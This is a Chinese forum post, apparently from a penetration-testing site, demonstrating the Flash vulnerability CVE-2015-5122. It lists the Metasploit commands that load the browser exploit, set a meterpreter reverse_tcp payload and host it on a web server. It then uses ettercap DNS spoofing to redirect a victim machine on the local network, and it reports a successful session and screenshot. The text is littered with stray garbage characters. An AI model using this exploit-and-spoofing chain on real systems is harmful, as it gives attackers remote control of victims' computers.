二、cve2015-5122漏洞实例演示虚拟机
' j( m% ^+ \6 _0 x( x& G6 N关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ! l: ]+ e9 { w1 s# h# E$ T
8 v) b1 X- u: J7 b# H! {0 _8 |5 F1 l5 O8 ~. F3 A search cve-2015-5122如图:
* M- ~/ b" `0 W7 H, J' C: `% }, B# t" ]) Z) U
- e$ q0 W6 A- \9 k1 E
+ o, v6 x! O* ^4 _) T 下面我们敲如下命令:
3 R0 Q4 e! C5 N0 ^& s' Q* L: ~3 }" p: }' a, T7 c$ y use exploit/multi/browser/adobe_flash_opaque_background_uaf
, n9 ^) y; P, @6 l: ]: vset PAYLOAD windows/meterpreter/reverse_tcp * Z) S* m. C& P7 N8 v
* e/ j9 I2 g" v3 _) n. _- |" M8 B$ r set LHOST 192.168.0.109
" g- q3 P8 t/ |# d; Q; D" O5 N& }1 _ set URIPATH / /*根目录*/ $ i' x% q- o7 u$ e# S7 T6 P7 S
+ z& \' v, F% k# E. d) D0 _B# j- d% D8 z, E1 y set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 + k" X; Q' q1 @1 s# a
* U/ n3 |. M/ D I% G$ _4 u# p3 w) i( ]3 g- t# P set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
, z- c# N" U! X: e2 `, a6 x然后show options如图: , [: v1 }' Y5 v5 b
) M" S+ k& F/ \" v7 G9 x
5 {- |7 e" b# S5 {6 }
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
7 p9 A* h/ s$ `0 u7 k* d
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
T( S4 Q" G( h6 H* p Y Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
* d. ~$ Y( M. |
$ h7 z. ?4 U; m
成功了,这时候我们断开ettercap,如图: 4 m0 h2 z/ |9 F, h8 X8 Y0 a
+ A9 m# ^& `. k+ C( K1 \& _ E' r3 V
' D$ j' q b& I1 s9 F* I5 h Screenshot如图: ' z/ z4 J7 C4 E `4 c# w; s
0 e! B) ^! V* }+ J( |: G/ A, F2 A" t2 V) i" e% j: p
$ y4 L2 ?' X$ \ M( C+ [- G% i
2 O1 v0 t3 G! f+ k v7 R
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |